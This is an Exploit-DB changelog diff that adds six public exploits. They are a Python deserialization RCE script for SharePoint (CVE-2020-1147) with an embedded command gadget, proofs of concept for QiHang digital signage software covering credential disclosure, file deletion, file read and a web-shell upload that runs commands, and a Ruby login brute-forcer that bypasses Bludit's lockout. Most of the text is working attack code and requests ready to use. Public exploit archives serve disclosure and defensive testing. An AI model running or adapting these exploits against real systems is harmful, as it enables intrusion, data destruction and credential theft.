DB: 2020-08-18

6 changes to exploits/shellcodes

Bludit  3.9.2 - Authentication Bruteforce Mitigation Bypass
Microsoft SharePoint Server 2019 - Remote Code Execution
QiHang Media Web Digital Signage 3.0.9 - Cleartext Credential Disclosure
QiHang Media Web Digital Signage 3.0.9 - Unauthenticated Arbitrary File Deletion
QiHang Media Web Digital Signage 3.0.9 - Unauthenticated Arbitrary File Disclosure
QiHang Media Web Digital Signage 3.0.9 - Remote Code Execution (Unauthenticated)

exploits/aspx/webapps/48747.py

@@ -0,0 +1,254 @@
+# Exploit Title: Microsoft SharePoint Server 2019 - Remote Code Execution
+# Google Dork: inurl:quicklinks.aspx
+# Date: 2020-08-14
+# Exploit Author: West Shepherd
+# Vendor Homepage: https://www.microsoft.com
+# Version: SharePoint Enterprise Server 2013 Service Pack 1, SharePoint Enterprise Server 2016 , SharePoint Server 2010 Service
+# Pack 2, SharePoint Server 2019
+# Tested on: Windows 2016
+# CVE : CVE-2020-1147
+# Credit goes to Steven Seele and Soroush Dalili
+# Source: https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html
+
+#!/usr/bin/python
+from sys import argv, exit, stdout, stderr
+import argparse
+import requests
+from bs4 import BeautifulSoup
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+from requests_ntlm import HttpNtlmAuth
+from urllib import quote, unquote
+import logging
+
+
+class Exploit:
+    # To generate the gadget use:
+    # ysoserial.exe -g TypeConfuseDelegate -f LosFormatter -c "command"
+    # ysoserial.exe -g TextFormattingRunProperties -f LosFormatter -c "command"
+    gadget = '/wEypAcAAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAADGBTw/eG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9InV0Zi04Ij8+DQo8T2JqZWN0RGF0YVByb3ZpZGVyIE1ldGhvZE5hbWU9IlN0YXJ0IiBJc0luaXRpYWxMb2FkRW5hYmxlZD0iRmFsc2UiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmZ4LzIwMDYveGFtbC9wcmVzZW50YXRpb24iIHhtbG5zOnNkPSJjbHItbmFtZXNwYWNlOlN5c3RlbS5EaWFnbm9zdGljczthc3NlbWJseT1TeXN0ZW0iIHhtbG5zOng9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sIj4NCiAgPE9iamVjdERhdGFQcm92aWRlci5PYmplY3RJbnN0YW5jZT4NCiAgICA8c2Q6UHJvY2Vzcz4NCiAgICAgIDxzZDpQcm9jZXNzLlN0YXJ0SW5mbz4NCiAgICAgICAgPHNkOlByb2Nlc3NTdGFydEluZm8gQXJndW1lbnRzPSIvYyBwaW5nIC9uIDEwIDEwLjQ5LjExNy4yNTMiIFN0YW5kYXJkRXJyb3JFbmNvZGluZz0ie3g6TnVsbH0iIFN0YW5kYXJkT3V0cHV0RW5jb2Rpbmc9Int4Ok51bGx9IiBVc2VyTmFtZT0iIiBQYXNzd29yZD0ie3g6TnVsbH0iIERvbWFpbj0iIiBMb2FkVXNlclByb2ZpbGU9IkZhbHNlIiBGaWxlTmFtZT0iY21kIiAvPg0KICAgICAgPC9zZDpQcm9jZXNzLlN0YXJ0SW5mbz4NCiAgICA8L3NkOlByb2Nlc3M+DQogIDwvT2JqZWN0RGF0YVByb3ZpZGVyLk9iamVjdEluc3RhbmNlPg0KPC9PYmplY3REYXRhUHJvdmlkZXI+Cw=='
+    control_path_quicklinks = '/_layouts/15/quicklinks.aspx'
+    control_path_quicklinksdialogform = '/_layouts/15/quicklinksdialogform.aspx'
+    control_path = control_path_quicklinks
+
+    def __init__(
+            self,
+            redirect=False,
+            proxy_address='',
+            username='',
+            domain='',
+            password='',
+            target=''
+    ):
+        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+        self.username = '%s\\%s' % (domain, username)
+        self.target = target
+        self.password = password
+        self.session = requests.session()
+        self.redirect = redirect
+        self.timeout = 0.5
+        self.proxies = {
+            'http': 'http://%s' % proxy_address,
+            'https': 'http://%s' % proxy_address
+        } \
+            if proxy_address is not None \
+               and proxy_address != '' else {}
+        self.headers = {}
+        self.query_params = {
+            'Mode': "Suggestion"
+        }
+        self.form_values = {
+            '__viewstate': '',
+            '__SUGGESTIONSCACHE__': ''
+        }
+        self.cookies = {}
+        self.payload = """\
+<DataSet>
+  <xs:schema xmlns="" xmlns:xs="http://www.w3.org/2001/XMLSchema"
+xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" id="somedataset">
+    <xs:element name="somedataset" msdata:IsDataSet="true"
+msdata:UseCurrentLocale="true">
+      <xs:complexType>
+        <xs:choice minOccurs="0" maxOccurs="unbounded">
+          <xs:element name="Exp_x0020_Table">
+            <xs:complexType>
+              <xs:sequence>
+                <xs:element name="pwn"
+msdata:DataType="System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.LosFormatter,
+System.Web, Version=4.0.0.0, Culture=neutral,
+PublicKeyToken=b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider,
+PresentationFramework, Version=4.0.0.0, Culture=neutral,
+PublicKeyToken=31bf3856ad364e35]], System.Data.Services,
+Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"
+type="xs:anyType" minOccurs="0"/>
+              </xs:sequence>
+            </xs:complexType>
+          </xs:element>
+        </xs:choice>
+      </xs:complexType>
+    </xs:element>
+  </xs:schema>
+  <diffgr:diffgram xmlns:msdata="urn:schemas-microsoft-com:xml-msdata"
+xmlns:diffgr="urn:schemas-microsoft-com:xml-diffgram-v1">
+    <somedataset>
+      <Exp_x0020_Table diffgr:id="Exp Table1" msdata:rowOrder="0"
+diffgr:hasChanges="inserted">
+        <pwn xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+xmlns:xsd="http://www.w3.org/2001/XMLSchema">
+        <ExpandedElement/>
+        <ProjectedProperty0>
+            <MethodName>Deserialize</MethodName>
+            <MethodParameters>
+                <anyType
+xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+xmlns:xsd="http://www.w3.org/2001/XMLSchema"
+xsi:type="xsd:string">{GADGET}</anyType>
+            </MethodParameters>
+            <ObjectInstance xsi:type="LosFormatter"></ObjectInstance>
+        </ProjectedProperty0>
+        </pwn>
+      </Exp_x0020_Table>
+    </somedataset>
+  </diffgr:diffgram>
+</DataSet>""".replace('{GADGET}', self.gadget)
+
+    def do_get(self, url, params=None, data=None):
+        return self.session.get(
+            url=url,
+            verify=False,
+            allow_redirects=self.redirect,
+            headers=self.headers,
+            cookies=self.cookies,
+            proxies=self.proxies,
+            data=data,
+            params=params,
+            auth=HttpNtlmAuth(self.username, self.password)
+        )
+
+    def do_post(self, url, data=None, params=None):
+        return self.session.post(
+            url=url,
+            data=data,
+            verify=False,
+            allow_redirects=self.redirect,
+            headers=self.headers,
+            cookies=self.cookies,
+            proxies=self.proxies,
+            params=params,
+            auth=HttpNtlmAuth(self.username, self.password)
+        )
+
+    def parse_page(self, content):
+        soup = BeautifulSoup(content, 'lxml')
+        for key, val in self.form_values.iteritems():
+            try:
+                for tag in soup.select('input[name=%s]' % key):
+                    try:
+                        self.form_values[key] = tag['value']
+                    except Exception as error:
+                        stderr.write('error for key %s error %s\n' %
+(key, str(error)))
+            except Exception as error:
+                stderr.write('error for selector %s error %s\n' %
+(key, str(error)))
+        return self
+
+    def debug(self):
+        try:
+            import http.client as http_client
+        except ImportError:
+            import httplib as http_client
+        http_client.HTTPConnection.debuglevel = 1
+        logging.basicConfig()
+        logging.getLogger().setLevel(logging.DEBUG)
+        requests_log = logging.getLogger("requests.packages.urllib3")
+        requests_log.setLevel(logging.DEBUG)
+        requests_log.propagate = True
+        return self
+
+    def clean(self, payload):
+        payload = payload\
+            .replace('\n', '')\
+            .replace('\r', '')
+        while '  ' in payload:
+            payload = payload\
+                .replace('  ', ' ')
+        return payload
+
+    def get_form(self):
+        url = '%s%s' % (self.target, self.control_path)
+        resp = self.do_get(url=url, params=self.query_params)
+        self.parse_page(content=resp.content)
+        return resp
+
+    def send_payload(self):
+        url = '%s%s' % (self.target, self.control_path)
+        # self.get_form()
+        self.headers['Content-Type'] = 'application/x-www-form-urlencoded'
+        self.form_values['__SUGGESTIONSCACHE__'] = self.clean(self.payload)
+        self.form_values['__viewstate'] = ''
+        resp = self.do_post(url=url, params=self.query_params,
+data=self.form_values)
+        return resp
+
+
+if __name__ == '__main__':
+    parser = argparse.ArgumentParser(add_help=True,
+description='CVE-2020-1147 SharePoint exploit')
+    try:
+        parser.add_argument('-target', action='store', help='Target
+address: http(s)://target.com ')
+        parser.add_argument('-username', action='store', default='',
+help='Username to use: first.last')
+        parser.add_argument('-domain', action='store', default='',
+help='User domain to use: domain.local')
+        parser.add_argument('-password', action='store', default='',
+help='Password to use: Summer2020')
+        parser.add_argument('-both', action='store', default=False,
+help='Try both pages (quicklinks.aspx and quicklinksdialogform.aspx):
+False')
+        parser.add_argument('-debug', action='store', default=False,
+help='Enable debugging: False')
+        parser.add_argument('-proxy', action='store', default='',
+help='Enable proxy: 10.10.10.10:8080')
+
+        if len(argv) == 1:
+            parser.print_help()
+            exit(1)
+        options = parser.parse_args()
+
+        exp = Exploit(
+            proxy_address=options.proxy,
+            username=options.username,
+            domain=options.domain,
+            password=options.password,
+            target=options.target
+        )
+
+        if options.debug:
+            exp.debug()
+            stdout.write('target %s username %s domain %s password %s
+debug %s proxy %s\n' % (
+                options.target, options.username, options.domain,
+options.password, options.debug, options.proxy
+            ))
+
+        result = exp.send_payload()
+        stdout.write('Response: %d\n' % result.status_code)
+        if 'MicrosoftSharePointTeamServices' in result.headers:
+            stdout.write('Version: %s\n' %
+result.headers['MicrosoftSharePointTeamServices'])
+        if options.both and result.status_code != 200:
+            exp.control_path = exp.control_path_quicklinksdialogform
+            stdout.write('Trying alternate page\n')
+            result = exp.send_payload()
+            stdout.write('Response: %d\n' % result.status_code)
+
+    except Exception as error:
+        stderr.write('error in main %s' % str(error))
+
+
+Regards,
+
+West Shepherd
+OSWE | OSCE | OSCP | OSWP | CEH | Security+
+West Lee Shepherd, LLC

exploits/hardware/webapps/48748.txt

@@ -0,0 +1,48 @@
+# Exploit Title: QiHang Media Web Digital Signage 3.0.9 - Cleartext Credential Disclosure
+# Date: 2020-08-12
+# Exploit Author: LiquidWorm
+# Vendor Homepage: http://www.howfor.com
+# Tested on: Microsoft Windows Server 2012 R2 Datacenter
+# CVE : N/A
+
+QiHang Media Web (QH.aspx) Digital Signage 3.0.9 Cleartext Credentials Disclosure
+
+
+Vendor: Shenzhen Xingmeng Qihang Media Co., Ltd.
+        Guangzhou Hefeng Automation Technology Co., Ltd.
+Product web page: http://www.howfor.com
+Affected version: 3.0.9.0
+
+Summary: Digital Signage Software.
+
+Desc: The application suffers from clear-text credentials disclosure vulnerability
+that allows an unauthenticated attacker to issue a request to an unprotected directory
+that hosts an XML file '/xml/User/User.xml' and obtain administrative login information
+that allows for a successful authentication bypass attack.
+
+Tested on: Microsoft Windows Server 2012 R2 Datacenter
+           Microsoft Windows Server 2003 Enterprise Edition
+           ASP.NET 4.0.30319
+           HowFor Web Server/5.6.0.0
+           Microsoft ASP.NET Web QiHang IIS Server
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2020-5579
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5579.php
+
+
+27.07.2020
+
+--
+
+$ curl http://192.168.1.1/xml/User/User.xml
+
+<?xml version="1.0" encoding="utf-8"?>
+<Users>
+  <User id="1" account="admin" password="admin" />
+  <User id="2" account="dev" password="dev" />
+</Users>

exploits/hardware/webapps/48749.txt

@@ -0,0 +1,58 @@
+# Exploit Title: QiHang Media Web Digital Signage 3.0.9 - Unauthenticated Arbitrary File Deletion
+# Date: 2020-08-12
+# Exploit Author: LiquidWorm
+# Vendor Homepage: http://www.howfor.com
+# Tested on: Microsoft Windows Server 2012 R2 Datacenter
+# CVE : N/A
+
+QiHang Media Web (QH.aspx) Digital Signage 3.0.9 Unauthenticated Arbitrary File Deletion
+
+
+Vendor: Shenzhen Xingmeng Qihang Media Co., Ltd.
+        Guangzhou Hefeng Automation Technology Co., Ltd.
+Product web page: http://www.howfor.com
+Affected version: 3.0.9.0
+
+Summary: Digital Signage Software.
+
+Desc: Input passed to the 'data' parameter in 'QH.aspx' for delete action
+is not properly sanitised before being used to delete files. This can be
+exploited by an unauthenticated attacker to delete files with the permissions
+of the web server using their absolute path or via directory traversal
+sequences passed within the affected POST parameter.
+
+
+Tested on: Microsoft Windows Server 2012 R2 Datacenter
+           Microsoft Windows Server 2003 Enterprise Edition
+           ASP.NET 4.0.30319
+           HowFor Web Server/5.6.0.0
+           Microsoft ASP.NET Web QiHang IIS Server
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2020-5580
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5580.php
+
+
+27.07.2020
+
+--
+
+
+POST /QH.aspx HTTP/1.1
+Host: 192.168.1.74:8090
+Content-Length: 105
+User-Agent: Eraser
+X-Requested-With: XMLHttpRequest
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Accept: */*
+Origin: http://192.168.1.74:8090
+Referer: http://192.168.1.74:8090/index.htm
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: close
+
+responderId=ResourceNewResponder&action=delete&data=["/opt/resources/Billboard.jpg"]

exploits/hardware/webapps/48750.txt

@@ -0,0 +1,222 @@
+# Exploit Title: QiHang Media Web Digital Signage 3.0.9 - Unauthenticated Arbitrary File Disclosure
+# Date: 2020-08-12
+# Exploit Author: LiquidWorm
+# Vendor Homepage: http://www.howfor.com
+# Tested on: Microsoft Windows Server 2012 R2 Datacenter
+# CVE : N/A
+
+QiHang Media Web (QH.aspx) Digital Signage 3.0.9 Arbitrary File Disclosure Vulnerability
+
+
+Vendor: Shenzhen Xingmeng Qihang Media Co., Ltd.
+        Guangzhou Hefeng Automation Technology Co., Ltd.
+Product web page: http://www.howfor.com
+Affected version: 3.0.9.0
+
+Summary: Digital Signage Software.
+
+Desc: The application suffers from an unauthenticated file disclosure
+vulnerability when input passed thru the 'filename' parameter when
+using the download action or thru 'path' parameter when using the
+getAll action is not properly verified before being used. This can
+be exploited to disclose contents of files and directories from local
+resources.
+
+Tested on: Microsoft Windows Server 2012 R2 Datacenter
+           Microsoft Windows Server 2003 Enterprise Edition
+           ASP.NET 4.0.30319
+           HowFor Web Server/5.6.0.0
+           Microsoft ASP.NET Web QiHang IIS Server
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2020-5581
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5581.php
+
+
+27.07.2020
+
+--
+
+
+Source code disclosure PoC:
+---------------------------
+
+GET /QH.aspx?responderId=ResourceNewResponder&action=download&fileName=.%2fQH.aspx HTTP/1.1
+Host: 192.168.1.74:8090
+User-Agent: lfi_test.wrapper/2.9
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: close
+
+--
+
+HTTP/1.1 200 OK
+Server: HowFor Web Server/5.6.0.0
+Date: Sun, 26 Jul 2020 22:49:08 GMT
+X-AspNet-Version: 4.0.30319
+Content-Disposition: attachment;filename=QH.aspx
+Set-Cookie: ASP.NET_SessionId=f0xji5cazmbzdygcr5g3qr03; path=/; HttpOnly
+Cache-Control: no-cache
+Pragma: no-cache
+Expires: -1
+Content-Type: application/zip
+Content-Length: 463
+Connection: Close
+
+<%@ Page Language="C#" ValidateRequest="false" AutoEventWireup="true" CodeBehind="QH.aspx.cs" Inherits="QiHang.Media.Web.QH" %>
+
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+
+<html xmlns="http://www.w3.org/1999/xhtml">
+<head runat="server">
+    <title></title>
+</head>
+<body>
+    <form id="form1" runat="server">
+    <div>
+    
+    </div>
+    </form>
+</body>
+</html>
+
+
+Arbitrary file read:
+--------------------
+
+http://192.168.1.74:8090/QH.aspx?responderId=ResourceNewResponder&action=download&fileName=.%2fGlobal.asax
+http://192.168.1.74:8090/QH.aspx?responderId=ResourceNewResponder&action=view&fileName=.%2fWeb.config
+
+
+Directory contents disclosure:
+------------------------------
+
+POST /QH.aspx HTTP/1.1
+Host: 192.168.1.74:8090
+Content-Length: 62
+User-Agent: lfi_test.wrapper/2.9
+X-Requested-With: XMLHttpRequest
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Accept: */*
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: close
+
+responderId=ResourceNewResponder&action=getAll&path=&fileName=
+
+--
+
+HTTP/1.1 200 OK
+Server: HowFor Web Server/5.6.0.0
+Date: Tue, 28 Jul 2020 23:51:13 GMT
+X-AspNet-Version: 4.0.30319
+Set-Cookie: ASP.NET_SessionId=f0ac1jyifcacvufnpptduv1f; path=/; HttpOnly
+Cache-Control: no-cache
+Pragma: no-cache
+Expires: -1
+Content-Type: text/html; charset=utf-8
+Content-Length: 4680
+Connection: Close
+
+{
+  "first": true,
+  "second": [
+    {
+      "name": "App_Data",
+      "type": "folder",
+      "size": 852992.0,
+      "uploadTime": new Date(
+        1525316885250
+      ),
+      "path": "/App_Data"
+    },
+    {
+      "name": "bin",
+      "type": "folder",
+      "size": 4398172.0,
+      "uploadTime": new Date(
+        1525316885046
+      ),
+...
+...
+      "name": "xml",
+      "type": "folder",
+      "size": 25519.0,
+      "uploadTime": new Date(
+        1525316885234
+      ),
+      "path": "/xml"
+    },
+    {
+      "name": "default.htm",
+      "type": ".htm",
+      "size": 1609.0,
+      "uploadTime": new Date(
+        1523859040000
+      ),
+      "path": "/default.htm"
+    },
+    {
+      "name": "Global.asax",
+      "type": ".asax",
+      "size": 100.0,
+      "uploadTime": new Date(
+        1523859032000
+      ),
+      "path": "/Global.asax"
+    },
+    {
+      "name": "IIS.dll",
+      "type": ".dll",
+      "size": 40960.0,
+      "uploadTime": new Date(
+        1523859036000
+      ),
+...
+...
+      "path": "/Media.Server.DeamonPlugin.Web.xml"
+    },
+    {
+      "name": "preview.htm",
+      "type": ".htm",
+      "size": 947.0,
+      "uploadTime": new Date(
+        1523859040000
+      ),
+      "path": "/preview.htm"
+    },
+    {
+      "name": "QH.aspx",
+      "type": ".aspx",
+      "size": 463.0,
+      "uploadTime": new Date(
+        1523859030000
+      ),
+      "path": "/QH.aspx"
+    },
+    {
+      "name": "server.xml",
+      "type": ".xml",
+      "size": 206.0,
+      "uploadTime": new Date(
+        1523859034000
+      ),
+      "path": "/server.xml"
+    },
+    {
+      "name": "Web.config",
+      "type": ".config",
+      "size": 2470.0,
+      "uploadTime": new Date(
+        1523859034000
+      ),
+      "path": "/Web.config"
+    }
+  ],
+  "third": 0
+}

exploits/hardware/webapps/48751.txt

@@ -0,0 +1,138 @@
+# Exploit Title: QiHang Media Web Digital Signage 3.0.9 - Remote Code Execution (Unauthenticated)
+# Date: 2020-08-12
+# Exploit Author: LiquidWorm
+# Vendor Homepage: http://www.howfor.com
+# Tested on: Microsoft Windows Server 2012 R2 Datacenter
+# CVE : N/A
+
+<!--
+
+QiHang Media Web (QH.aspx) Digital Signage 3.0.9 (pre-auth) Remote Code Execution
+
+
+Vendor: Shenzhen Xingmeng Qihang Media Co., Ltd.
+        Guangzhou Hefeng Automation Technology Co., Ltd.
+Product web page: http://www.howfor.com
+Affected version: 3.0.9.0
+
+Summary: Digital Signage Software.
+
+Desc: The application suffers from an unauthenticated remote code execution.
+The vulnerability is caused due to lack of verification when uploading files
+with QH.aspx that can be written in any location by utilizing the 'remotePath'
+parameter to traverse through directories. Abusing the upload action and the
+'fileToUpload' parameter, an unauthenticated attacker can exploit this to
+execute system commands by uploading a malicious ASPX script.
+
+Tested on: Microsoft Windows Server 2012 R2 Datacenter
+           Microsoft Windows Server 2003 Enterprise Edition
+           ASP.NET 4.0.30319
+           HowFor Web Server/5.6.0.0
+           Microsoft ASP.NET Web QiHang IIS Server
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2020-5582
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5582.php
+
+
+27.07.2020
+
+-->
+
+
+<html>
+  <body>
+    <script>
+      function uploadShellPoC()
+      {
+        var xhr = new XMLHttpRequest();
+        xhr.open("POST", "http:\/\/192.168.1.74:8090\/QH.aspx", true);
+        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundaryhbcZX7o0Hw19h3kr");
+        xhr.setRequestHeader("Accept", "*\/*");
+        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9");
+        xhr.withCredentials = true;
+        var body = "------WebKitFormBoundaryhbcZX7o0Hw19h3kr\r\n" + 
+          "Content-Disposition: form-data; name=\"fileToUpload\"; filename=\"cmd.aspx\"\r\n" + 
+          "Content-Type: application/octet-stream\r\n" + 
+          "\r\n" + 
+          "\x3c%@ Page Language=\"VB\" Debug=\"true\" %\x3e\r\n" + 
+          "\x3c%@ import Namespace=\"system.IO\" %\x3e\r\n" + 
+          "\x3c%@ import Namespace=\"System.Diagnostics\" %\x3e\r\n" + 
+          "\r\n" + 
+          "\x3cscript runat=\"server\"\x3e\r\n" + 
+          "\r\n" + 
+          "Sub RunCmd(Src As Object, E As EventArgs)\r\n" + 
+          "  Dim myProcess As New Process()\r\n" + 
+          "  Dim myProcessStartInfo As New ProcessStartInfo(xpath.text)\r\n" + 
+          "  myProcessStartInfo.UseShellExecute = false\r\n" + 
+          "  myProcessStartInfo.RedirectStandardOutput = true\r\n" + 
+          "  myProcess.StartInfo = myProcessStartInfo\r\n" + 
+          "  myProcessStartInfo.Arguments=xcmd.text\r\n" + 
+          "  myProcess.Start()\r\n" + 
+          "\r\n" + 
+          "  Dim myStreamReader As StreamReader = myProcess.StandardOutput\r\n" + 
+          "  Dim myString As String = myStreamReader.Readtoend()\r\n" + 
+          "  myProcess.Close()\r\n" + 
+          "  mystring=replace(mystring,\"\x3c\",\"<\")\r\n" + 
+          "  mystring=replace(mystring,\"\x3e\",\">\")\r\n" + 
+          "  result.text= vbcrlf & \"\x3cpre\x3e\" & mystring & \"\x3c/pre\x3e\"\r\n" + 
+          "End Sub\r\n" + 
+          "\r\n" + 
+          "\x3c/script\x3e\r\n" + 
+          "\r\n" + 
+          "\x3chtml\x3e\r\n" + 
+          "\x3cbody\x3e\r\n" + 
+          "\x3cform runat=\"server\"\x3e\r\n" + 
+          "\x3cp\x3e\x3casp:Label id=\"L_p\" runat=\"server\" width=\"80px\"\x3eProgram\x3c/asp:Label\x3e\r\n" + 
+          "\x3casp:TextBox id=\"xpath\" runat=\"server\" Width=\"300px\"\x3ec:\\windows\\system32\\cmd.exe\x3c/asp:TextBox\x3e\r\n" + 
+          "\x3cp\x3e\x3casp:Label id=\"L_a\" runat=\"server\" width=\"80px\"\x3eArguments\x3c/asp:Label\x3e\r\n" + 
+          "\x3casp:TextBox id=\"xcmd\" runat=\"server\" Width=\"300px\" Text=\"/c net user\"\x3e/c net user\x3c/asp:TextBox\x3e\r\n" + 
+          "\x3cp\x3e\x3casp:Button id=\"Button\" onclick=\"runcmd\" runat=\"server\" Width=\"100px\" Text=\"Run\"\x3e\x3c/asp:Button\x3e\r\n" + 
+          "\x3cp\x3e\x3casp:Label id=\"result\" runat=\"server\"\x3e\x3c/asp:Label\x3e\r\n" + 
+          "\x3c/form\x3e\r\n" + 
+          "\x3c/body\x3e\r\n" + 
+          "\x3c/html\x3e\r\n" + 
+          "------WebKitFormBoundaryhbcZX7o0Hw19h3kr\r\n" + 
+          "Content-Disposition: form-data; name=\"action\"\r\n" + 
+          "\r\n" + 
+          "upload\r\n" + 
+          "------WebKitFormBoundaryhbcZX7o0Hw19h3kr\r\n" + 
+          "Content-Disposition: form-data; name=\"responderId\"\r\n" + 
+          "\r\n" + 
+          "ResourceNewResponder\r\n" + 
+          "------WebKitFormBoundaryhbcZX7o0Hw19h3kr\r\n" + 
+          "Content-Disposition: form-data; name=\"remotePath\"\r\n" + 
+          "\r\n" + 
+          "/opt/resources\r\n" + 
+          "------WebKitFormBoundaryhbcZX7o0Hw19h3kr--\r\n";
+        var aBody = new Uint8Array(body.length);
+        for (var i = 0; i < aBody.length; i++)
+          aBody[i] = body.charCodeAt(i); 
+        xhr.send(new Blob([aBody]));
+      }
+    </script>
+    <form action="#">
+      <input type="button" value="Click" onclick="uploadShellPoC();" />
+    </form>
+  </body>
+</html>
+
+<!--
+JSON response for successful upload:
+{
+  "first": true,
+  "second": [
+    "cmd.aspx"
+  ]
+}
+
+GET request: http://192.168.1.74:8090/opt/resources/cmd.aspx
+Command issued: /c whoami
+
+Response:
+robertovolare\administrator
+ -->

exploits/php/webapps/48746.rb

@@ -0,0 +1,92 @@
+#!/usr/bin/env ruby
+## Title: Bludit  3.9.2 - Authentication Bruteforce Mitigation Bypass
+## Author: noraj (Alexandre ZANNI)
+## Author website: https://pwn.by/noraj/
+## Date: 2020-08-16
+## Vendor Homepage: https://www.bludit.com/
+## Software Link: https://github.com/bludit/bludit/archive/3.9.2.tar.gz
+## Version: <= 3.9.2
+## Tested on: Bludit Version 3.9.2
+
+# Vulnerability
+## Discoverer: Rastating
+## Discoverer website: https://rastating.github.io/
+## CVE: CVE-2019-17240
+## CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2019-17240
+## References: https://rastating.github.io/bludit-brute-force-mitigation-bypass/
+## Patch: https://github.com/bludit/bludit/pull/1090
+
+require 'httpclient'
+require 'docopt'
+
+# dirty workaround to remove this warning:
+#   Cookie#domain returns dot-less domain name now. Use Cookie#dot_domain if you need "." at the beginning.
+# see https://github.com/nahi/httpclient/issues/252
+class WebAgent
+  class Cookie < HTTP::Cookie
+    def domain
+      self.original_domain
+    end
+  end
+end
+
+def get_csrf(client, login_url)
+  res = client.get(login_url)
+  csrf_token = /input.+?name="tokenCSRF".+?value="(.+?)"/.match(res.body).captures[0]
+end
+
+def auth_ok?(res)
+  HTTP::Status.redirect?(res.code) &&
+    %r{/admin/dashboard}.match?(res.headers['Location'])
+end
+
+def bruteforce_auth(client, host, username, wordlist)
+  login_url = host + '/admin/login'
+  File.foreach(wordlist).with_index do |password, i|
+    password = password.chomp
+    csrf_token = get_csrf(client, login_url)
+    headers = {
+      'X-Forwarded-For' => "#{i}-#{password[..4]}",
+    }
+    data = {
+      'tokenCSRF' => csrf_token,
+      'username' => username,
+      'password' => password,
+    }
+    puts "[*] Trying password: #{password}"
+    auth_res = client.post(login_url, data, headers)
+    if auth_ok?(auth_res)
+      puts "\n[+] Password found: #{password}"
+      break
+    end
+  end
+end
+
+doc = <<~DOCOPT
+  Bludit <= 3.9.2 - Authentication Bruteforce Mitigation Bypass
+
+  Usage:
+    #{__FILE__} -r <url> -u <username> -w <path> [--debug]
+    #{__FILE__} -H | --help
+
+  Options:
+    -r <url>, --root-url <url>            Root URL (base path) including HTTP scheme, port and root folder
+    -u <username>, --user <username>      Username of the admin
+    -w <path>, --wordlist <path>          Path to the wordlist file
+    --debug                               Display arguments
+    -H, --help                            Show this screen
+
+  Examples:
+    #{__FILE__} -r http://example.org -u admin -w myWordlist.txt
+    #{__FILE__} -r https://example.org:8443/bludit -u john -w /usr/share/wordlists/password/rockyou.txt
+DOCOPT
+
+begin
+  args = Docopt.docopt(doc)
+  pp args if args['--debug']
+
+  clnt = HTTPClient.new
+  bruteforce_auth(clnt, args['--root-url'], args['--user'], args['--wordlist'])
+rescue Docopt::Exit => e
+  puts e.message
+end

files_exploits.csv

@@ -42987,3 +42987,9 @@ id,file,description,date,author,type,platform,port
 48743,exploits/php/webapps/48743.txt,"vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution",2020-08-12,zenofex,webapps,php,
 48744,exploits/hardware/webapps/48744.py,"Artica Proxy 4.3.0 - Authentication Bypass",2020-08-13,"Dan Duffy",webapps,hardware,
 48745,exploits/php/webapps/48745.txt,"GetSimple CMS Plugin Multi User 1.8.2 - Cross-Site Request Forgery (Add Admin)",2020-08-13,boku,webapps,php,
+48746,exploits/php/webapps/48746.rb,"Bludit  3.9.2 - Authentication Bruteforce Mitigation Bypass",2020-08-17,"Alexandre ZANNI",webapps,php,
+48747,exploits/aspx/webapps/48747.py,"Microsoft SharePoint Server 2019 - Remote Code Execution",2020-08-17,"West Shepherd",webapps,aspx,
+48748,exploits/hardware/webapps/48748.txt,"QiHang Media Web Digital Signage 3.0.9 - Cleartext Credential Disclosure",2020-08-17,LiquidWorm,webapps,hardware,
